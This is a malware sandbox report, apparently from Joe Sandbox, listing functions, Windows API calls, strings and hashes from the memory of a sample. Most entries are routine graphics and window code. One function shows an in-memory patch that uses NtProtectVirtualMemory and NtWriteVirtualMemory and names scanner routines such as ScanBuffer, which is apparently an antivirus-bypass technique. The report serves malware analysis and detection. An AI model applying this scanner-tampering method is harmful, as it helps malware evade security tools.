Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($BM
API String ID: 2831685396-2980357723
Opcode ID: 257e45706544b93f9affe5265054ef79630a6b3ad5929f18e82a0295a9587a1e
Instruction ID: a952316f8624ff361bb3ea72e22a3c3431d3fd55cd1bc7c238b620fad490a96c
Opcode Fuzzy Hash: 257e45706544b93f9affe5265054ef79630a6b3ad5929f18e82a0295a9587a1e
Instruction Fuzzy Hash: 55D12D71A002189FDF94DFA8D884BAEBBFAFF88304F148465EA15E7295D7349844CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02A12D88 Relevance: 25.8, APIs: 17, Instructions: 258COMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 02A12DBC
GetClientRect.USER32(00000000,?), ref: 02A12DDF
GetWindowRect.USER32(00000000,?), ref: 02A12DF1
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02A12E07
OffsetRect.USER32(?,?,?), ref: 02A12E1C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,02A1303B), ref: 02A12E35
InflateRect.USER32(?,00000000,00000000), ref: 02A12E53
GetWindowLongA.USER32(00000000,000000F0), ref: 02A12E6D
DrawEdge.USER32(?,?,?,00000008), ref: 02A12F6C
IntersectClipRect.GDI32(?,?,?,?,?), ref: 02A12F85
OffsetRect.USER32(?,?,?), ref: 02A12FAF
GetRgnBox.GDI32(?,?), ref: 02A12FBE
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02A12FD4
IntersectRect.USER32(?,?,?), ref: 02A12FE5
OffsetRect.USER32(?,?,?), ref: 02A12FFA
FillRect.USER32(?,?,00000000), ref: 02A13016
ReleaseDC.USER32(00000000,?), ref: 02A13035

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
String ID:
API String ID: 2490777911-0
Opcode ID: 0a1995a0b5ebde7a74c40524f047fa263e13802da4029ffee4973d9dc3fffdf1
Instruction ID: 9067775fe53d2fc3d3f69a724eeb163aa469fd992785f8a096ffed86a0c01991
Opcode Fuzzy Hash: 0a1995a0b5ebde7a74c40524f047fa263e13802da4029ffee4973d9dc3fffdf1
Instruction Fuzzy Hash: B7A10B71E00108AFDB41DBE8C985FEEB7FAAF49314F1480A6E915E7251CB75AA01DF60

Uniqueness

Uniqueness Score: -1.00%

Function 029F5B54 Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON

Download Yara Rule

APIs

Part of subcall function 029F614C: GetDC.USER32(00000000), ref: 029F61A2
Part of subcall function 029F614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 029F61B7
Part of subcall function 029F614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 029F61C1
Part of subcall function 029F614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,029F4D0F,00000000,029F4D9B), ref: 029F61E5
Part of subcall function 029F614C: ReleaseDC.USER32(00000000,00000000), ref: 029F61F0

SelectPalette.GDI32(?,?,000000FF), ref: 029F5B97
RealizePalette.GDI32(?), ref: 029F5BA6
GetDeviceCaps.GDI32(?,0000000C), ref: 029F5BB8
GetDeviceCaps.GDI32(?,0000000E), ref: 029F5BC7
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 029F5BFA
SetStretchBltMode.GDI32(?,00000004), ref: 029F5C08
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 029F5C20
SetStretchBltMode.GDI32(00000000,00000003), ref: 029F5C3D
CreateCompatibleDC.GDI32(00000000), ref: 029F5C9E
SelectObject.GDI32(?,?), ref: 029F5CB3
SelectObject.GDI32(?,00000000), ref: 029F5D12
DeleteDC.GDI32(00000000), ref: 029F5D21

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: 536f0ccb1c5e148fbe9d3473dabc760f9e4d78106b1869ae53f121ee21c377e0
Instruction ID: c633646f10f488b96e3502a1e3b313125265fd9025ee17df89ae49841c0bd0f3
Opcode Fuzzy Hash: 536f0ccb1c5e148fbe9d3473dabc760f9e4d78106b1869ae53f121ee21c377e0
Instruction Fuzzy Hash: 187125B6A04205AFDB90DBA8D984E5ABBFDAF89300F558554F608DB281D734ED00DF60

Uniqueness

Uniqueness Score: -1.00%

Function 029F3510 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 029F3527
CreateCompatibleDC.GDI32(00000000), ref: 029F3531
GetObjectA.GDI32(?,00000018,?), ref: 029F3551
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 029F3568
GetDC.USER32(00000000), ref: 029F3574
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 029F35A1
ReleaseDC.USER32(00000000,00000000), ref: 029F35C7
SelectObject.GDI32(?,?), ref: 029F35E2
SelectObject.GDI32(?,00000000), ref: 029F35F1
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 029F361D
SelectObject.GDI32(?,00000000), ref: 029F362B
SelectObject.GDI32(?,00000000), ref: 029F3639
DeleteDC.GDI32(?), ref: 029F364F
DeleteDC.GDI32(?), ref: 029F3658

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: e01611a867f23863051b2dd9876916cff703e21ccd3c6ed3e818c8134b45c765
Instruction ID: be3e67a1aff2bbbaa1177c1bce01821297938ebb5b36c2ebca621b501a3208e6
Opcode Fuzzy Hash: e01611a867f23863051b2dd9876916cff703e21ccd3c6ed3e818c8134b45c765
Instruction Fuzzy Hash: 8341FC72E04249AFEB90DBE8DC41FAEB7BDEB88700F118455B714E7280D775A9009B64

Uniqueness

Uniqueness Score: -1.00%

Function 029D743C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61windowregistryCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 029D7454
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 029D7460
RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 029D746F
RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 029D747B
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 029D7493
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 029D74B7

Strings

Magellan MSWHEEL, xrefs: 029D744A
MSH_SCROLL_LINES_MSG, xrefs: 029D7476
MSWHEEL_ROLLMSG, xrefs: 029D745B
MouseZ, xrefs: 029D744F
MSH_WHEELSUPPORT_MSG, xrefs: 029D746A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Message$Window$Register$Send$Find
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 3569030445-3736581797
Opcode ID: b22eed0abb9779e8f5e86a4d6d41368b34340d15bf0d4d173d94df0c451388ec
Instruction ID: f16d82300ba407ebfe62d0cb619ec6e1873034c778af599d70d9d49ccc661c8a
Opcode Fuzzy Hash: b22eed0abb9779e8f5e86a4d6d41368b34340d15bf0d4d173d94df0c451388ec
Instruction Fuzzy Hash: 1A112E70644301AFF7119FE5DC81FA6FBAAEF84710F10C466B9498B280D7B0A940EB60

Uniqueness

Uniqueness Score: -1.00%

Function 029FDD94 Relevance: 18.1, APIs: 12, Instructions: 142COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 029FDDAF
GetWindowRect.USER32(00000000,?), ref: 029FDDCA
OffsetRect.USER32(?,?,?), ref: 029FDDDF
GetWindowDC.USER32(00000000,?,?,?,00000000,?), ref: 029FDDED
GetWindowLongA.USER32(00000000,000000F0), ref: 029FDE1E
GetSystemMetrics.USER32(00000002), ref: 029FDE33
GetSystemMetrics.USER32(00000003), ref: 029FDE3C
InflateRect.USER32(?,000000FE,000000FE), ref: 029FDE4B
GetSysColorBrush.USER32(0000000F), ref: 029FDE78
FillRect.USER32(?,?,00000000), ref: 029FDE86
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,029FDEEF,?,00000000,?,?,?,00000000,?), ref: 029FDEAB
ReleaseDC.USER32(00000000,?), ref: 029FDEE9

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
String ID:
API String ID: 19621357-0
Opcode ID: e1dcf8dce5c2af69d38bc1696ae7abf659e47647bc6a567b9f5ad5e24cd96238
Instruction ID: 34d8de62842d58e023e64c9c85da5c06bb601b8e577ee450b212dc2bc4ee5916
Opcode Fuzzy Hash: e1dcf8dce5c2af69d38bc1696ae7abf659e47647bc6a567b9f5ad5e24cd96238
Instruction Fuzzy Hash: 79410B71A00109ABDB51EAE8CD41EEFB7BEEF89320F504551FA04F7290DA31AA019B60

Uniqueness

Uniqueness Score: -1.00%

Function 029D25CC Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029D296A

Strings

The unexpected small block leaks are:, xrefs: 029D27A3
String, xrefs: 029D283D
bytes: , xrefs: 029D27F9
, xrefs: 029D28B0
Unknown, xrefs: 029D2828
The sizes of unexpected leaked medium and large blocks are: , xrefs: 029D28E5
An unexpected memory leak has occurred. , xrefs: 029D272C
Unexpected Memory Leak, xrefs: 029D295C
7, xrefs: 029D273D

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 42046af54dc52ca03a68b1ef2968a5ba64123022787efc74b132cb886d6d6224
Instruction ID: 50ec96a51b92c2af497df4a7a64c49192194b55799507aa9a8096bcab3407468
Opcode Fuzzy Hash: 42046af54dc52ca03a68b1ef2968a5ba64123022787efc74b132cb886d6d6224
Instruction Fuzzy Hash: B8A1F130E043688BDF21AB2CC884BD9B6E9EB49754F1480E5ED49AB283CB758985DF51

Uniqueness

Uniqueness Score: -1.00%

Function 029FB24C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 029FB285
GetSystemMetrics.USER32(00000000), ref: 029FB2AA
GetSystemMetrics.USER32(00000001), ref: 029FB2B5
GetClipBox.GDI32(?,?), ref: 029FB2C7
GetDCOrgEx.GDI32(?,?), ref: 029FB2D4
OffsetRect.USER32(?,?,?), ref: 029FB2ED
IntersectRect.USER32(?,?,?), ref: 029FB2FE
IntersectRect.USER32(?,?,?), ref: 029FB314

Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23

Strings

EnumDisplayMonitors, xrefs: 029FB264

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: 5c78a4b019ce3178c1bb75d5cccc1b3d8b3ac02ddb7509f63f31c12e78289575
Instruction ID: 853e9e939987235d3c6dd4d204b48850d360890319d71691fe1d8fe2188949fb
Opcode Fuzzy Hash: 5c78a4b019ce3178c1bb75d5cccc1b3d8b3ac02ddb7509f63f31c12e78289575
Instruction Fuzzy Hash: F4311B72E41209AFDB90DEE5D884AEFB7BCEF49304F048526EA15E2201EB74D505CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A28CE4 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 02A28D04
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02A28D1B
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 02A28D21
IsBadReadPtr.KERNEL32(?,00000004), ref: 02A28DAF
IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02A28DBB
IsBadReadPtr.KERNEL32(?,00000014), ref: 02A28DCF

Strings

C:\Windows\System32\KernelBase.dll, xrefs: 02A28D16
LoadLibraryExA, xrefs: 02A28D11

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Read$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1061262613-1650066521
Opcode ID: 6b43fc4113c68451910e42810f7fcccf41bd6126466496868131eaa86777d864
Instruction ID: c72111b7c4cfc9aa4fed9288c238ef07edd8875a2e7aefd1e31998a5d4f9d058
Opcode Fuzzy Hash: 6b43fc4113c68451910e42810f7fcccf41bd6126466496868131eaa86777d864
Instruction Fuzzy Hash: 0A316271640315BFEB20DB68DC85F6977BCEF54328F108514FA14AB281DB78E958DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02A0FEEC Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02A0FF37
CreateCompatibleBitmap.GDI32(00000000,?), ref: 02A0FF5B
ReleaseDC.USER32(00000000,00000000), ref: 02A0FF66
CreateCompatibleDC.GDI32(00000000), ref: 02A0FF6D
SelectObject.GDI32(00000000,?), ref: 02A0FF7D
BeginPaint.USER32(00000000,?,00000000,02A1003E,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 02A0FF9F
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 02A0FFFB
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 02A1000C
SelectObject.GDI32(00000000,?), ref: 02A10026
DeleteDC.GDI32(00000000), ref: 02A1002F
DeleteObject.GDI32(?), ref: 02A10038

Part of subcall function 02A0F8F4: BeginPaint.USER32(00000000,?), ref: 02A0F91F
Part of subcall function 02A0F8F4: EndPaint.USER32(00000000,?,02A0FA5A), ref: 02A0FA4D

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 3867285559-0
Opcode ID: 9692139e59d0c6d526955d3562cb9714138eeee684a4d82a1fe4dc6daa193bcd
Instruction ID: d5603d09c5d51b0ac8678fd5bc2e682e0df5e0d255494251689f0cbb12d66ef1
Opcode Fuzzy Hash: 9692139e59d0c6d526955d3562cb9714138eeee684a4d82a1fe4dc6daa193bcd
Instruction Fuzzy Hash: E041EC75B00204AFDB10EBA8DD84B9EB7FDAF89700F108469BA09EB681DE759D05DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02A06E84 Relevance: 16.6, APIs: 11, Instructions: 91COMMON

Download Yara Rule

APIs

IsWindowUnicode.USER32(?), ref: 02A06E9E
SetWindowLongW.USER32(?,000000FC,?), ref: 02A06EB9
GetWindowLongW.USER32(?,000000F0), ref: 02A06EC4
GetWindowLongW.USER32(?,000000F4), ref: 02A06ED6
SetWindowLongW.USER32(?,000000F4,?), ref: 02A06EE9
SetWindowLongA.USER32(?,000000FC,?), ref: 02A06F02
GetWindowLongA.USER32(?,000000F0), ref: 02A06F0D
GetWindowLongA.USER32(?,000000F4), ref: 02A06F1F
SetWindowLongA.USER32(?,000000F4,?), ref: 02A06F32
SetPropA.USER32(?,00000000,00000000), ref: 02A06F49
SetPropA.USER32(?,00000000,00000000), ref: 02A06F60

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$Long$Prop$Unicode
String ID:
API String ID: 1693715928-0
Opcode ID: 4484e1ed26e98f7a543c04b64dee814bb3a121aa7731b6214291546145037175
Instruction ID: 08e7302fcebdf37811519e02daa89f1eb7aef081e099df578b0141f0cbae0e7e
Opcode Fuzzy Hash: 4484e1ed26e98f7a543c04b64dee814bb3a121aa7731b6214291546145037175
Instruction Fuzzy Hash: AC31ABB9504258BBDF10DF98EC84EEA77EDAB08368F108A51F914CB2D1CB34D9509B64

Uniqueness

Uniqueness Score: -1.00%

Function 02A2AE00 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 420libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,02A6A350,02A2B464,OpenSession,02A6A350,02A2B464,ScanBuffer,02A6A350,02A2B464,00000000,02A2B44C), ref: 02A2AF47
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02A2AF4D

Part of subcall function 029EFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
Part of subcall function 029EFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
Part of subcall function 029EFD38: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
Part of subcall function 029EFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
Part of subcall function 029EFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
Part of subcall function 029EFD38: FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4

Strings

OpenSession, xrefs: 02A2AE92, 02A2AFBA, 02A2B2C4, 02A2B351
UacInitialize, xrefs: 02A2AF61, 02A2B0CB, 02A2B1E2
UacScan, xrefs: 02A2AEEB
NtWriteVirtualMemory, xrefs: 02A2AF3D
ScanBuffer, xrefs: 02A2AE39, 02A2B013, 02A2B136, 02A2B253, 02A2B3C2
C:\Windows\System32\ntdll.dll, xrefs: 02A2AF42
ScanString, xrefs: 02A2B072

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressCurrentHandleLibraryMemoryModuleProcProcessVirtual$FreeLoadProtectWrite
String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
API String ID: 327143009-4174081549
Opcode ID: 35d3a0a61cfae25c4601ed5ef9c11f3c4981afd9c4d79e05ad805ca147c79b54
Instruction ID: 9c9d8ae221d2efaad9978aecdc76ce4df92cca8852cc0f65cb9b898382df98d3
Opcode Fuzzy Hash: 35d3a0a61cfae25c4601ed5ef9c11f3c4981afd9c4d79e05ad805ca147c79b54
Instruction Fuzzy Hash: 74F12131A011199BDF05EBA8C980FDEB3BABF95304F51D4A6E009EB214DF30AE459F61

Uniqueness

Uniqueness Score: -1.00%

Function 02A0FA8C Relevance: 15.2, APIs: 10, Instructions: 227windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(00000000,?), ref: 02A0FBA4
SaveDC.GDI32(00000000), ref: 02A0FBC7
IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 02A0FC07
RestoreDC.GDI32(00000000,00000000), ref: 02A0FC33

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Rect$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 1976014923-0
Opcode ID: d3b12f71f14c272d8587200dffbf1fb55496d314562c76b02610ad92729efd99
Instruction ID: 53d49966e75f90398419edbf7e5f08ae6f90c3681c6e09a48b1e67e477255877
Opcode Fuzzy Hash: d3b12f71f14c272d8587200dffbf1fb55496d314562c76b02610ad92729efd99
Instruction Fuzzy Hash: 7A91F674A002489FDB15DFA9D4C5FAEBBF9AF49304F1440A5EA44EB292DB35E980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02A1F0F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 02A1F143
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 02A1F161
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 02A1F16E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 02A1F17B
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 02A1F188
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 02A1F195
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 02A1F1A2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 02A1F1AF
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 02A1F1CD
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 02A1F1E9

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
